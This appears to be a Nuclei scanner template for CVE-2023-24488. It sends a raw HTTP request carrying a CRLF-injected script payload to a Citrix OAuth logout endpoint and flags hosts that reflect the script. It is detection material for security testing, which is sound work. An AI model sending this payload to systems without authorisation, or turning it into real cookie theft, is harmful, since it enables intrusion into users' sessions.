xss-nuclei-template-cve-2023-24488.yaml.md

🎯 XSS nuclei template CVE-2023-24488.yaml

id: CVE-2023-24488

info:
  name: CVE-2023-24488
  author: assetnote
  severity: medium
  description: description
  reference:
    - https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
  tags: tags

requests:
  - raw:
      - |+
        GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}
        Cookie: NSC_TASS=/Citrix
        Cache-Control: max-age=0
        Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
        Sec-Ch-Ua-Mobile: ?0
        Sec-Ch-Ua-Platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
        Sec-Gpc: 1
        Accept-Language: en-GB,en
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate
        Connection: close
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <script>alert(document.cookie)</script>
      - type: status
        status:
          - 302